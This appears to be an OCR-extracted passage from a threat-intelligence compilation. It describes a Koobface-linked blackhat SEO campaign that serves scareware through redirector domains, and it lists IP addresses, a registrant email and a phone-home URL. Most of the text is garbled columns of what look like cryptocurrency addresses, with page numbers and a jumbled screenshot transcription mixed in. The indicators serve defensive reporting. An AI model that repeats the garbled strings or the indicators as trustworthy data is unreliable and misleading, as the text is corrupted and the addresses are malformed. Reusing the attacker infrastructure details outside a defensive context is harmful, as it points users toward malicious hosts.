LLAJMH5wHYVWN1aP4PTFT9eL8JY4ZDrC5r 
LLAMQP5Dm86n2cGbp55XYiKUwmiDn56uAN 
LLAMtRLTEK8BdUnG2qNNPKGFZjAu71kgsR 
1LAoeL9FjD4)cfyNeTafusB5PVfrQPEBQz 
LLAqzy3budRA4B5moHbKGPDugqbQAJVMY7 
LLaR2iqQ4FqlwZT7PVirnZWXZs59jcc5vT 
LLaSoRLg5AYs29m3L8jiUBbmtpyjFhxV8D 
LLASW3QhAksqiepzGsX5UJjRvwt4QY1XHb 
LLAVWRfDG5d7jLAHK5YUJ82jP0525Gtrv 
LLAxybrCgyTXByxuoMmZ9FvzhMJAFLJ3cw 
LLaYiUe3XhVxd8PPsxXqswhWfGFeGYQqCAG 
LLaYQobJVdgXVHw2wWWV2o0FLnPKFGPhzTL 
1LLB2JV1lizbGxgm43t3kNeA8FFhqbCsDues 
1LB469c8QxjDTGxTz1lvibRXfvohF3hMfBZ 
LLb4nZTHCqtQfQtFC5jJYjDHKjjbraYSuiw 
LLB5myAbQigZMgNj34tb7uhPfm7gY8Tfrh 
1LB6eL1LIGZs)VWfhDLASMU2L908PhEzcc7 
1Lb6Giwyrn7qg3S1Lt6UdU9Kx2Z2NgQm1E6 
1LB7bkGf7VYrynnxnHhs45CAbsk43DAmoL 
1Lb7LBS9K2fbiSuLNpQyvKNPeqhGqR7y9 
LLb8XRYZWiHZ5PbvKY5bi6nNjJEWj4JY4vw 
1LBaKGa7LOMrJWJH7Dco2LnxXWihZskt6tx 
1LBamJsPd8zaGDHqY258EFL77wZZ7GX19h 
1LLBBCSi1XyAW2ZAZV4qq3Z6qA2qKJDa2LU 
LLbbvvXyZnoagFBbQDXpoyBzvGXnqeHDZM 
1LLbcGoxdoj6Zgq6jNkqkLPZCp84PQjsipW 
1LBd2Ddm9iYBBYvYGgb6ww)]VsujaHbcEY 
1LLbdedNUfgnYvjhwvSZ6EFznzdGhGd23it 
1LBE224idwtTdeciNL8ulCKnc4YW6kqM6s 
1LBE256PBVy8yeGPkJN3equcJsqYZQXWHC 
1LLbfd3UqFgVs4DkvXfLZU85bgDRE2rpBPt 
1LbgMGgY9hbudrUFR80MH1DocwLhYow7]x 
LLBiH1LnJ4x6LwRg33zoup2hBT 6tCCqDfHE 
LLbJsYm4CF4c5Uv6v3kxLmq1rt9BQoXerU 
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Instead of relying on purely malicious domains, the [3]Ukrainian fan club, the one with 
the Koobface connection, remains the most active blackhat SEO group on the Web, and due 
to the quality of the historical OSINT making it possible to detect their activity - [4]practice 
which prompts them to [5]insult back - they’re also starting to put efforts into making it look 
like it’s another group. 
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However, knowing the tools and tactics that they use, next to evident efficiency-centered 
mentality, they continue leaving minor leads that make it possible to establish a direct rela- 
tionship between the group, the Koobface worm and the majority of blackhat SEO campaigns 
launched during the last couple of months across the entire Web. 


The "News Items" themed blackhat SEO campaign is also serving scareware from the 


domains already participating in the U.S Federal Forms themed blackhat SEO campaign, 
what’s new is the typical dynamic change of the redirectors in place. 
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LLBKWL3ZfVIELVUQLQCbfwDcvurN7rA7S7 
1LBmb3FJEbMULZUKNA5mMHMb2xDUWXxAZD)f 
LLbmg9nTbQzQQZxXtpeAkLsaSavCpUSiAes 
1LbQLBjPmcazWEk80pE2c9Cgqq6UUxToyK 
LLbRbYg1XiwMG74orzLrMPqPAmvulwUPqS 
1LLbrLJywvJjSnSRr3RrrEX9vAKPDWpY6iQ 
1LBseForPV8fcwuzfhAZYR4s1oSDxXMhuy 
LLbsNHA5yTtUPmDozodEpvRQpBRNtuGuhu 
1LBsTeYbcprzWB4UZ9ZjravZ3J4HrkHd8T 
1LBuaG8nAxfvJGdSTpQmZLqYGeJeFtQGwT 
1Lbv5s8B7MTUdWDUkh2exL1INaAVx8vAQ9rj 
LLBW2sXEMVDmAgA6YK8rhAKogUrpQ5ord7 
1LbWLLDemwFfPGRFRLE55FNNWAUPTKFPYA 
LLbYivhxvaevTC20w91hDEQWn4aNvIToFFr 
LLbZV53NJTpDSe7C1MUSCTa9NxCvLRvT4w 
1LC1VzZBnJUxAMtfmXKDbtynA7citjAe6qs 
1Lc3X7006QEkKTWBABDMdVyJKe4zyMk]JvBz 
1LCaZSoKWpdSlepwtoVxG8]VjAWt3x9tDo 
1LcCUmR5guCLCUmprwf9T9o0u8CaxhzZAHnL 
1LceUp8BRw5Uk8zxbrVbNg4SuD8Av6gk7y 
LLCFHLx3hnDPm4FQv11gG8VHjGzC4Ywn4u 
LLcGc8W9w5ndUAR7nvma4s3Qmt91QNni8b 
LLchrHhg8ftWMY15y58Vv5aqnyb4GpGaf] 
LLChTnWE8pytNnvhXJN82iWUjBXrCpEr89 
LLCiEdfdDKq2vqnWEgGSnALhABKJeg6cN9 
1LcJCRrB6FGuckMzzJvzrmFfcMqYpshDdL 
LLC) KX4inJAhaClyd2boKnC80wMBQ8NiYe 
1LCJtmQKzamK32YUPnxaZSaw36imQ1DNKW 
1LCLQjPDpsuFLbjELq7ggyVlowW4n3kYti 
1LCm]3foG3r2SZDGoitKKzknJKyRtX8Hjv 
LLcMUvclvDEnvicx3TDof3xnzUwcxzkvjr 
1LCoEmnUoTNgNnSeSHWM6exCiF2dQEryEQ 
1LcPRPFSTRUc2BwUWV3C8yxY2JmGutDNLZ 
1LcCQ4PUAXgKxJx6UKDEHMxTriH8S0Q5d6) 
1LCqSzPXESERGifhTw8WspUkgSWG6qC2YT 
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1LLCSFxFKwoAMiZaSCvZt9SHyjwC2zkyFkm 
LLcSTWaNC5kYVhR8WfzLpvW5ZEJvDCquWwP 
1LLcuT2DiJzLyiyNK9qgsrPQJ50eX6TW5rS 
1LCVgxEnuGrsuqoVjoK7WywQ8sPkyz944r 
1LCvoawTkyRpnFRwVX6FqdxqoS1cHpRSGM 
1LCVv3XuSYEdqYMaYjq8HDErhSSB19eNQK 
1LLcyyJhnSC2poPNzxCrsGj3wgbEvcuAcmD 
LLcZL3tWSEOUVHQVSSPvX8PTRGi5tpxi8K 
1LCzyNnouxKyzbyiJnc4UAoSGqQvsM42CQ 
1LD3L4EhsS9XC5PWXu2XnbFzEKafkyoatw 
1LD4KVExnuitBwVYaLEEsMcDgkDSAa6Yyb 
LLDAJLFZPd3xoow2biTgowSQmgMywrLLyh 
1LdapDgSdhgXSsRLsmguWr6wYLEuGFK1Gf 
LLdc8qSieCEZH4tWk454kwz8TzQnqbZPm1 
L1LdCUCZdzLnuB2W15PY5naBcmSTeghkamz 
1LDDT1zr3FnHonaMeH7A5D4pyMtRHFSbzD 
1LdeafSLGFyCneTWzskaM71nj4jjnom9pb 
1LdGdnbCG9fN8V6N1XW79CGHnHcGXoCeyL 
1LDgSrofPVPBDJtH4uMfsv 7Ha9GBQaQGK3 
LLdHiy9wWwNCVsKwRL2t9rsDpb6CcBWRXv 
1LLDHX84kppqaGg89RBYUDz7JrtGdYyNofP 
1LDKfUJGBEbso4gdbnJQ3HBm78H7hd1j6g 
LLdLQgjkmqTtNtVU3yqAadW4z9YaNPdHtU 
1LDm4dArel1pHrdfA93PXSrQKyUZ6zejnfc 
LLdNCBTj2d2ffB682p5Dadhtwg2k4bBe9K 
1Ldo68fBp12t2KjUGxg370DtAxNmLkcAaF 
LLDpN9iby7L2RnND34MkewBxuYbMab7Ys3t 
1LDrtwGPLLHkzmUWIi54Y2p3ySZ5A2M4BZc 
1LdSnBotCF6MvGz6huceHw8WrgVsA5gxbt 
LLDSnHAcU1sEodd8Pn8KZ2xNMdZhkKyinSd 
LLdssHbEq9LUceS7buhRvYyVBZtRlaofWY 
LLDtCkHPQLJb4vzVU8Lzq9ynBpXFwGdEFs 
LLdTZrzr5V9AnFmhTDYzYno71EpoodctU2 
1LDus9rBQ7d6h8F4C7K4rL8KQ4XUMcaFoqg 
LLDVGx5qbhMxNAxdhnhj4gbETMzfQ2ewZS 
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1LDVrAHJnazayWp7ViHKa6mfs9moYQGB9b 
LLDW8h4DHoB6sf5tNY7XjGbZppifflyBrG 
LLdWjxAWL9ZTGPk2VRkqDEcyKS9aCshUGR 
1LDXCZhn6ghvf2QPjuoON9FpeB8cWPe6DLE 
LLE3dxunwY5DW4UzDiMiwjsUwVvdgRgr82 
LLE46kgaC3FvMz12SojWLCNTDbnBLEciiN 
1Le4G5LsiDXXa8pvjGX7Rqb9CfvcmDXYg6 
1LLE4UMFuPQyXZ17qUuPTBUragfz5GPsKte 
LLE6dhHn1ZH6EEjuxyje69xLG9d9yQSEz1 


1Le8DSWm6p7GKH9AQe7 bdypmHK827vVULh2 


LLe8wdkrvaqjs3)xCTyyTa52mMVF9IQRIAO4h 
LLEDTd7krgQzeBmDbhVNam34pafx6qnt38 
1LeEjXbNABCBSqB7oYF9qDJ5iYPLi8180d 
LLeEMdL2PWjHjXojKvW7tNZzLwvur2tci 
1LLEeQu2eQQFuBZuq19fRoCwzorRnXSPZwd 
lLeevlmseyoto22f6BNqob5y2q6aPPMmX3R 
LLeFi52QZHwvrjfVJxCDacXDSiYtVsmjDv 
LLegLVX1MM4UPoP4qxkrtcwnF pJkK4pHYBH 
LLeHCFxZKQSfQ2ZMV8MgwBbkJEQBm51SKk 
LLEjctgejQUJvaQCSxrHfck5VDrY79yRV6 
LLejFIQE4L1snnPVX7sQRJ1VbVMTDN5iko 
1LLEkuBBjesMjRWSPaWg]2KZMCk243rRVAx 
LLeENMNhC5m4f5gmYZZhHBQwyx7Rg2DgRxzZj 
LLEnpp8fZdLkAUurkZUp9DLyrx5FG6gSsC 
LLeoktCumXWx8QRMvR3qSDtpuj7xCXBzR1 
LLepLBjN7ZA34kD4Y4TU6DMn1cqs8HFYLT 
LLEPZXYJvnR61kdHxt1TJXuG3Wc58C4xle 
1LLer66YcvngRbRQtlnofmnLsfdcTNU6WD8 
1LLESb7g41HkDcP5SgnZJVCsQQR2xLCLD2X 
LLETQcZnJdGwSfVntajQd1xEkdk5h2eQT6 
LLEWvDkGaJKiWSwtk8fd3QmDJSAHUrPs72 
1LeZFeJJDYSPRMSdQvKPX30KJZDyBiS8o} 
1LLf1PpzfY psHy6ZdBm2UZFCMb6uAGOGFvG 
1LLF94rmeK2Q4LTFLXmdYyF5WxV3w56Xra6 
LLfBpJCKc74yszfNfmXTgwfaLMWn1BQUeS 


25675 


LLFEG4mYyn9056rrxQZG6ksrPjno5uapQw 
1LLFeS2iNUEHgUZik5b80To73bq9bhKt9vx 
LLffrg7EXPcVzApoh8N8ZDcXtzjaDY3Jsh 
LLFFxVTmMQ17mR52grrcZGMh9sceMXRegth 
LLfG4fxnTvTzJ86FMWRXoAtUnfFu6MsSuz 
LLFGWJpXs7RMzTqNDRg1irfMmWGX8wyuppL 
LLfFHDhWy3sgfYAW3kLZkzCRzrW5h5cVV13 
LLFHM7XMeoBHaxshg9b3eGTJMwxxBx8iMW 
1LFhnYKsDSDy9awZAEK2BQTPffBE3qQbkW 
1LFHXu6dve3zA1cV7EdYumssktHwCzJFsC 
LLFL7crKMfZqWwkKfccmgJtz9tt2MfLvPd77 
LLFMFfSNoA2XkbyAK8ybSzDjPWHs1kdinW 
1LFmuhaSGDcez53dtHJTIN1UDxtynip8wA 
LLFPMG2ssRcxmtCb82ELqtm7pinjJLMyCir 
LLFQ6rAJM5KY7KLaXJbxdCxBaqykhY4tjSZ 
1LLFrAPHKpy8kUcVq5Reac57KeFgAq6drjy 
1LLfrBKXFuUSWGxRs4hmmUtWEy3nEgC758SN 
LLFThH4JCvEmPzAyzuuVffgFixELovN14X 
LLFTtbq96Kzk2nZecu9qRg4tKtyejGPMV6 
LLFtZbkfDrqZ5aNGWz4a1lzZECHgNyx3PEXE 
LLFvTyYpKuZGYAFcs6yw4aE496BsqP87pV 
LLfwxDYTqjPkuazKU5GWFiupfpg2jNPqih 
LLFY9 1pmVw8qqGEcRw4e3A21gmkkdinyZK 
LLFYQ9wWW3raMkbVeVI1c4fFpXnUmZ1USbtsc 
1LG1kzBw62mb557zm6eEpU3Qov86cBVrvB 
1Lg1Vr9e723wjtbnwCb3upN2WMtb8iDvto 
1LLg2fE6sr8iiwEGVRZDDjbqyLUaBuhtuji 
LLg3Wd5fJPmMETEZps2qU855FX8mtsH9T5i 
1LG4r2hcLqsVnNnT1fkdgkKx9jmE6qdZaB 
1LG6GohzYB1XWS5FvZ2NeeCgYDDYaEr3fg 
LLGONX9TVUVATF8p1t8eHMnMxHLpDmgwir 
LLgAldymWoTeZzjbjCDv28eHi9TdmqwETM 
LLgA22EFJLNRETMY1ZH2bQhqVZG6tgmZ4A 
LLgAtKwmHfBBrW21n34xDMkV7Zn4hpKmvA 
1LgDeocZWEWRFUc3xwMSVApgmztgR5nAVy 
25676 


1LgfGB3PGCILZbBH87ev1LYJeZPqG81e5n 
1LGFoDBZBdwyCkBGovjb4MH9YqshMiKBdT 
LLGFwb8NhVwoSZcCjT9ewwGJiUc9xXTeFn 
LLgFWQuL9ficKJMU1m2FE8R3AJb8J6gRr6 
1LLGfYq32BKZosBjaoK5isnXSj93VY3kBX] 
LLgit7YGR2p5LFV1LigFriZ7N3H4uGmqnuB 
LLgkEFhXSnVuiwZ2bnhF8zunUg81BGhPFs 
1LgLpmL7eMgdpzPkmsnM6aHJZ74qXo0zg32 
LLgLtxmDqmnrLqr42ipiuQZpWARMpwLDpe 
LlLgmcacmtbjEvXw36t3UMxfYf4TtXqCs7k 
L1LGMQRe5DeyVAE5rdVWYpYJHLGepTKZm8X 
LLgnBWWLaJ8ZQTuKCiaSmsRXmj4JuvFfQN 
1LGndqMgQGAcA1G8jYHFLtit5zFElyrYdY 
1LGq7Uhre3Eem6USQFnLZ2BcK64CXnexNa 
LLgRMm2QwdXnL405XXJrj37SVdFa6tmncE 
1LgrMu6AgUiU9uaJTyDtYeZQA1jWmeqRUb 
1LGSiTn202P4CuDKUjpm4W3EwpLy2xkKEP 
1LLGSj4VBkTj99DDy8Bn4E7WrvCAcBqCHD3 
LLgUbSzXGmy4gKv6zYKXYpuvdZX8kemGNF 
1LLgwb1YiPrb98JGdv2Mhkz7VG4pRdZ6xCx 
1LgXXCV6nT7RKgy7pgMayT8AYpnvuB58E9 
LLh5FJXXZU8MLxVeKm4pqyC2qw5w3VuGRB 
1LLh5xjorLgZYtyKFvBPBVBaPjxiVPNYRzZR 
LLh6Vk6qSh5LWPGQ3XkmwVS6CDinK8TBcA 
LLHOMT7qKkqfK7ymrsbT4GDMEyFJ5AqgRx7 
LLHAfAn764Ybpq8fxBURCzx8w6yXzFvHab 
LLhBEqiCRhAeodiAzDTwBXgSrkKsZg8N8vk 
LLhbRJWLsAVx1gGwak9v2x1xCm3rsGQs8n 
LLhbxX6j3bqKRWWRo2hzkFZJHdKFdHLxyNJ 
1LhCntPjEbologelbMq9kxXaYZgiC2BVnJM 
1LHexpvpHdwL4ZCGqcQ1CHJt5FgzNWo2wR 
LLHFE72AQwUPkwf]3f5jY3ExbV2v2EkKNCv 
LLHFZ9Vm4ergMY3xYZU4b6svecmDo7JdCR 
1Lhg6esnjZZROBPTBJU5BXGyFRPpU8VLiP 
LLHiS2bPLU27rCFoeoMM4HwyKWLQ716x7Z 


25677 


LLhiUK1LL7SMLGLPytUxrHmgo6JptR2jvX7 
LLHKtrSUxAWknPwvcECViYBjWrFoH2V8Nc 
LLHMdWT6bqo58pdakmRDpTJ2Aa2B8DxkYY 
1LHnDdRtqEtvXWfukVPDE5KLZHkX7XEo6h 
1LhNg3a4RLUh6YBtfY 9FobYfFcPYatkxWZ 
LLhoLfWPMUaK8jW3kWEGYZt4kJrbQ5c8UQ 
LLhPE27reeVMiJRRadWXMWn8814LZMAJFf 
LLHTAEJFHMMWvfmHxJUDy6TqFZpkmgUYSt 
LLHTbtMApEu2LWYkZabZZY7C4QyM3rmtuE 
1LLhU3etRcSqCLngLzFXqXeltHB43iwielU 
LLHU63UvVe5RRxZqcFZX1FlgsV2Z9WgXxXw 
1LHwzFGRtSrKKmUpWfJ3PG7zxpLihL1K7F 
LLHYDxoERHUgyoTN3bdWajmRm1WwrWwBBq 
1LLi75PiuohGtl6wrDZeHk3vNEVVgbyYxtub 
LLICLUQWXjFsifq85ZKZCSkssbAZHxkhk5 
LLIEWMXwjN2NgNLFycCmh3eBuStS54QUZ) 
LLIGDNfM5Vftv6eD)xZq4BdktqV6écfgFMk 
LLININnN1ZvzLkr9lagZ3DERembmmAxVu2G 
LLitZ4faTVBHx5h8yn3ai7UyHSaaWqZfNe 
LLiVMmeajHdxSAZWBqqo88z1AFBs31bVni 
LLiIX8i3mMcEPNYRT9LWxofDedc9Ndv4Gbov 
LLiXo8aDnZ9bLHhxZ3dJq5waeyBVaqjJBL2t 
LLIY8U3spkoBz1facam91eG2UZ7PgLFE22 
LLiIZ29ERP5mN4rdxn2hFHYYuRGpCX4jLDw 
1LLj1fBbUnXfhtFCXtAizxqDtHN5t7gPNtp 
LLj1ZJVHhq5CcFqQqs9gy6JKDZV42C3mMEP 
1Lj37x9sFFdWkkAgoqaEo1VACvKZ9Ar57n 
1LJ5ctLmYWuXydPabSiw3kA8H6mMZK7MmBh 
1LLj8emPMh9uQov9rzAY 6ZotGRIerGNK9Dd 
1LjBRPVXw8FMTsSdaeF3s15y6uL6ymKAEi 
LLjcEbpUkhKyuYyyejnXuQokZxXjFWQQWx8 
1LjD6EDS7fy4HQg3EACg4D1p935iwyURdXS 
1LJF6GGSLxrdV77HauSUueWKyW25BL644S 
1LJfvys6bSkCALyouWRRLWfkv1CXrBKVUq 
1LLJKDAHgC8HaYpntMexj7Ypy33XXYU6hY7 
25678 


LLJkKFAtAKwXgcwP5wKHDPo1NYGYHSBQYi6 
LLIKM8yA2tw5CqnH3qBxzuDgTnzvTpwAyr 
1LLJKxRkyJdFAhHMj7xAjVeCTofiF CKe3icY 
1LJnatiDtUkppy88Ew7r9XzioQY5NNt680 
1LLjpPqlbsarwYH3y3wNNNxUpsgnshndaXp 
LLJQR88fVTeERHSCYBTZSWdPnwrBiyRSMb9 
LLJTUAN8JdhXAitX5Pt21sL9pVA1r5Vm3Q 
1LJTXBZszLPofexSLpZCdn9nNvEGqGAMxQ 
LLJIVDMMWCng5cNqHjJSxtgD9WiiinyT5x9 
1LJWwccWsUqKQpGswMkAQ7waspcGiBTyfA 
LLJY2bthxZkSqffnwMWTKojSC6JwNs8SSm 
1LJz1FrB1vjwPLpPGUeL6TfUy2TkivgqE4o 
1LK4EgUYGm5uE3xUWNr1l6nmYoYChn7 TwOf 
1LLk4KSvTkm1gdrqYWEZJeyrqHiGFJdjuoK 
1LK4N1zRjgoeKu9aheMgevkzxgpF1CxREY 
1LK6iedToCUUDWTDXBQK724hhg2Sabo7ba 
1Lk7tASvfCLmjmc64gTyLoPhRi4fw4vHbV 
1LK8p2qoMx5FALKPVWN4bUrG4ugfzSSiyg 
1LLKAgqx1fFd1Ve12NHPKVLiSgPBkS3jZ4t 
1LkBbEfLBTFhHH8y1Qx6Teqr6eUi8mfWLLq 
1LKbU7CmMBDgAs8bUCyr5DoFw5]Xtx2sSRZ 
LLkDpxx6fTJzqikoDMXZPPkKnPsQ77Hv8r2 
LLkKDWJAaY18WYFqwqKnArfL9OmajUofPnja 
1LKEBERuc6UwhRG2GcRRD3zZZM8W62A9j2L 
1LKEjD8M2h6ErUPt] 7kvA5X9XjKXNE5tAN 
1LKeJkPU8AUBVfcgExqMA29Sylyn68pEg2 
1LKeQAKkZy92jHy 7eM98QdFh4QoKAXUFtS 
LLkh6Y9VXqjpYQnKSLfwogsknxvhxLeVx1 
1LKHeEf4nzBdcyzWreNunpoi8nASex7kZM 
LLKhf6PALYVF5Wxtb9ksxsWdXxhizNX1JwZ 
1LKi4nmry8mdnc6U3H8fh3SVF8cSGidnvG 
LLKJeQFkm3t9WFZJ3U3DxRqlYHmQBubU1lu 
1LKLG4nBiuURr6BYKMxhf9yXmAQZtV2s]4 
LLkNAvt]dYjMbhf2ZgDY4JaGaXjafW4jvE 
1LKPiAtw52ViKfxDs1TxAgz47aWyNDsVDk 


25679 


LLkrKCUDTiqWAojpmpmE8g22pKo8djovhp 
1LKuRD13DzzrKAa812kgHL7DeVYrU7TpEv 
LLkvoP2NFyoLwYuE9aUjzy2Bdk2RFrGVux 
L1LKwnWMYT6LyeiELM2qzhPD72b1KaXXVHj 
1LKzcVBTEmCHLvuyx5DkXzvLqiAY5fwdBE 
LLL39woToYiIKXVSLIWYAqkhh1kSjxpqLrB 
1LL4bPD4J2nCpqyGM8BE8PdcmMtgVDnCXV 
1LL6ThHUGuaYvfXpKLj)jWooM2W2cnet5SwFtY 
1LLL7yXgSFtTxXEMcjR8K]j LoxwfjeuKXFWU 
1LLhpqsok9XVMLcn6Nm2fiMhXChM7xnuVt 
1LLK48QmPTxXHhdGSbVVXvDLPPE6x1dsZgz 
1LLmMGdnYF4479suqk2CgCEzSk641trtvre 
LLLQGtRBDhan2FQGhVzx34ZLB4h8jrLpay 
1LLQzDfmEuWceR8VHYim9wVbj2PFRRBnR5 
1LLSyG8ZUQY3F LEVUDCHXEGHuhGkT3D2Gf 
LLLTAEKZC6RBAoocyMVvXiCKEUJ3u4Bmw8s 
LLLWCDK8wCvVcCTYeWCgsrXvzNkXHnx94Ar 
LLLyhjWifEosUgDsRSub1p6f44QZJRHfVB 
1Lm23UB6o0aiAaZN5toNp18N2EuVSvFwm78 
LLM2E6PTXJFiwLwYjqQ5nDTGhffC)Xn8Nc 
1LM47V9LSxUR3Wp7VbhP2HhEa6po7VePrr 
LLM6rQhj2jr5yoNTtLvxr3vumD98yNjT15 
1Lme16iRYd8ZKH47wXToYtHaRkYZJHSoF7 
LLmfWhJQ3DsufhGf2hECUnCZCSXTnQBHMQ 
LLMHLLfc5QpbMxyh9KsAdfRLp2y53)sNic 
LLMiqaQqMTxM4PV6SXBga7v6MrLP5733YZ 
LLMJPKqASVddvuNiGekjoeb3qzenQEUezu 
1Lmki64BjPwSCfZAmoaKkjnYC7yaK4EAtk 
L1LMKmx5W6eLr51F1IN9DnBV5bWi29a3j4Nc 
1LmkSgSSLWzDcyEcpnJSC63AuF23YjQPdn 
1LmMM59KZoT7qLyUvYfFha3CUQCYyctAbQ3 
LLMmMHVkD3ms21HP6GYrBQhrbbfZzEcHM33 
LLmMMVjNx5XNHP7CWooW44Vf18RbMVs2ueL 
LLMNFBGpfpYjLJRtcxXcFFpC1TPwhyYase5 
LLMoSYGAhME8erSHXoRBrX8S8kzu6wWLWwRw 
25680 


LLmoZhPL7DXoNW82LmmzZKTw1vEsoKUjK3F 
1LMRLn1ctndkxeP3zd8899MzbjgyWDcMoF 
LLMRnwmYTpjVs6BaWnK2tW2eRnyRxZNp8j 
1LmsuB62YyagkgGDyLwcAxYSPp3CMqgv9i 
1LmSuGJwxBBRL9t5RMZVCeTbvsGnxMwcaf 
LLmujNaRgKP29d3D4mRgVHH4jRMySMJotE 
LLMWEHKHadtjP1VskhqVtXEXrd5uCqQQKT7 
1LmweWouDiUmN6pPuolps1q4D8m2SDVXiv 
1LMX6iQqQySi7nCcS8cyq5iRMLpWTv2QRq 
LLMyTRUjmoHxJvChHNWECPewE9PbRX42x6p 
LLMZyscjrABUFwM1kcmeW1g5KRz5Gb60XN 
LLn2Ct5cyrFfh9eR8fkGwRniasb2gFqRng 
LILN2DLab1EZUR7h79bKyYFpeMTZ2Fk57Lz 
1Ln3S4XcUyft9KPDgpKSNYojirikhrSLnk 
LLN4CJ9PWbfWak6nGeYiYKYRcxhD8d33qm 
LLn4MjV8rTChAfLN 7wkKvADAujKytp]50S6 
1Ln8TDS3zWtuX7uCGuVdFvRThNQZSEr2ub 
1LnAmeeefYqM3thrGKVsbBJWyvZnigutoK 
1Lnaybz9uLy9BBSeRhzBT3AmJbBu9cCSsQ 
1LnazLt1LtDqw9PLv4GA7YeBhPKHPtCb7b 
LLNcvJZ8D3VHTiTRmah4pgx8EjPrQsxXqw7 
1Lnd43kPra6aSZ898M6E3cuDv9rxgLznqr 
1Lnee6FD51NVLsq18ilhv8DmPos1V8UfYk 
LLnFP5GutTZmimWwijYq6B3Gtg4dnyT8kev 
1LLNfp8iYooEuu8GbqeLyi5KERkde3uRdvd 
LLnJuX1TzmDPSVgAxWfLqKNwdC53ZkKNuik 
LLNMg8Ye3FYSL8J]6SpxXu4SxagXnm86CZ9h 
LLnmUqpPrDpmr1iiAoJbrcRqp8f7aSYWfw 
LLNnqCfrTSYsU7isS91L7BQfDxaCdu8EjW 
LLnoHdiJVJPJDnTyR4JSAjJUDxXBHVX7Qtm 
LLNoHHtwszgDfBodg5JMC75jdmv9Va9h]y 
1LLnozotKDPjXxfMPHyRqZthYckHvDcvnNU 
LLnpKINWgJhB9Gyldy2kSg5ptMhZ5R59PD 
LLnroZPbc63nTsbhq25SE17V1tttdeb6VH 
LLNtLT8cmBopkphZu5tNspNQHLdn5r7PZD 
25681 


LLNtMBL4NeA7wiBzsTmMQBLqr6036K5YcHc 
LLNtWprY26Yav9KfBFNDwSRRbtLuCXQkZ3 
1LNu3ruUZRS1Y]Wk6zd2sFLTyvJkQ39g3) 
LLnvN6c5GjYLqxYMJme28MyyMj5rSXbxmn 
1LnvYXs9AwgQhmFiYfTJLEDokvsinDR5QM 
LLnwupgL78555gq98C60v37vV6ATIxfjxXUX 
LLNZu8VpLjQumj89qwVES8TzxzqvPRKcsS 
1Lo1C8q2cvp7Lk7cSHkjJjCmpNeafS19sj 
LLo26prdSmQ16m1w4yTTlyhZ30oM9sGhmcmyY 
LLo4hjARB2SvdRs2efnvi9irjK4HRwfkPY 
1Lo57vsgY3sa4piEXjVHGSnz34uKdXSoEX 
LLo6nV2cYDZqokYUHBTFIMZ3dEwGvTUnME 
LLobVCKXKbiLhECB37xDZhQi2BQGPetRr7 
LLodPqEBKncqR9SyBU6p7mxMmvFkKQBviq 
LLoJKf3FxKkDurYZXD1IMkPSuPi2U63i1Vm 
LLojrYpQr4Hb6kPWUa5EkXg7iETM66gkM9 
LLokaSA7FAPy1DbApb1JdF5J6jmXrujXUw 
LLooTmW5hvmuEYPPey1P2xbCK5TeNVygX7 
LLorFn4EMJbxuFFmjJhtohVsQgYXjZ2cqcF 
LLOToYGJJFoUBE4fpNp7zeH3tVQvvwVC5] 
LLoV9JbfaYQ2cZYw7jaK8ZN5nHfb5KKbr1 
LLowW3H5SjaT1TQ3jTWCgE5c7FAwAoo2gc 
LLoyNBDczUQQhrEs5rMazx7d8CNAAKwWVvr 
1Lp2gox6epT7gYXrqJR5MRZUeIM57WK7Vr 
LLP6KC43zACqucgdTjvEpA3fuFGJ43iXAx 
LLpAjVa4 Xbfr6P2azpC8dgScfHy6banUeB 
1LPbLy4PEetU2xgwnQVSXJJNce9BL6qHmm 
1LpC6x1Byzj5SdAwyoFFYT Yae3F9nuNhoZ 
LLPDHUU3mzZAyP6EP]JuXFJaag45fg7wfpt 
1LLpfbf2ns7Bixq3vBc4FfifLdyKBG6VW17 
LLPfhr4dyMzy7QUopU6dWUPpJ2fTbPZnfA 
1LLpfZ3Z1EBELmMUm/7xigEj7ZLyNCy9ET5Tt 
LLpgwTEoS9Po05118P8brVVrfyi2AkUfd5u 
LLphQLAyhfSwjD92dNichPL2KMEFbDdXQxX 
LLpiuUR9ySEfVDEICP4R41Bm/7VihZUEki 
25682 


cnn news 


Google 
Mixx 


Digg 


Sootng wah offer and he went on the cnn news 


Yahoo a = a4: 
- eg 5 


MSN 


cnn news 

news live Man 
bag ‘ 
iphone mms i find 
« tv5 live cm 
died full dizi yike 
DIKE bp stock ap new 


Let’s dissect a sample campaign currently parked at [6]coolinc.info. Once the http referrer 
checks are met, bernie-madoff.coolinc .info/fox-25-news.html executes the campaign through 
a static images/ads.js located on all of the subdomains participating in campaign (bernie- 
madoff.coolinc .info/images/ads.js; eenadu-epaper.hmsite .net/images/ads.js) with generic 
detection triggered only by Sophos as Mal/ObfJS-Cl. 


Through a series of redirectors - usanews2009 .com/index.php - 78.46.129.170 - Email: 
derrick2@mail.ru; newscnn2009 .com/index.php - 193.9.28.62 - Email: derrick2@mail.ru; 
cnnnews2009 .com/index.php - 91.203.146.38 - EMail: derrick2@mail.ru; the user is redi- 
rected to the scareware domain through justintimberlakestream .com/?pid=95 &sid=4e6ffe - 
193.169.12.70; Email: info@zebrainvents.com. 


The [7]scareware itself (phones back to worldrolemodeling .com/?b=1s1 - 193.169.12.71) 


is [8]dynamically served through 78.46.201.89; 193.169.12.70 and 92.241.177.207 with an 
diverse portfolio of fake security software domains parked there. 


2571 


1LLPJa9iBYtqTLRyL85JDsjPRv13cysvsz4 
LLPkK3QNAa5GJ1A2T9x4ALXKVoEgGjXo5Rr 
1LLpn1iBhp8jieEGyraJ5koPrv7dEatgkB5k 
1LPnDwaL2dU6ziIQE6NkKPBLOVbQh2MpTzQH 
1LpP8Ea1lU8tc95DgHGJeX11FrAWKIAjSbR 
1LPp8kGwnhSp6omQssLpM26GWdsSfAk2NA 
1LLPq5eLS5NXTykUvk6dLWV9XRMN5eZHGC6 
LLpqDo9NQ8dM1W)jxyvKt6BLW7q4MRsZZeu 
1LPSpcSAcqP3ZdR78r8m9TGpRP29sSRpQp 
LLPVTbSMoH6L1qmSShKSVMG2dposcNawDw 
LLPWyuHhPdEJ2XppWmPpv4eUwP9rt2gTSR 
LLpYYh8jyFBMfuKvRzxshK70V2HSEt7Xm2 
1LLPZWE8mQSK7NTLkVbRvUn39pDsETLfiAr 
LLq6wcLyjxxZR7AZxxtzub8n2AcqBGjfd8 
1LQAtf5BK8fbr8NnNRo3QTLcAwmF1LiKLn5 
LLqAyj62zHa9T3qo8iLFJYW7KXuo5TEegn 
1LqdMppeokJzdNstD4RRdiFHfsKnDcqgrZ 
LLQfFGWMoAVUbECPp9E2rrLmMgV3RzhkY6h 
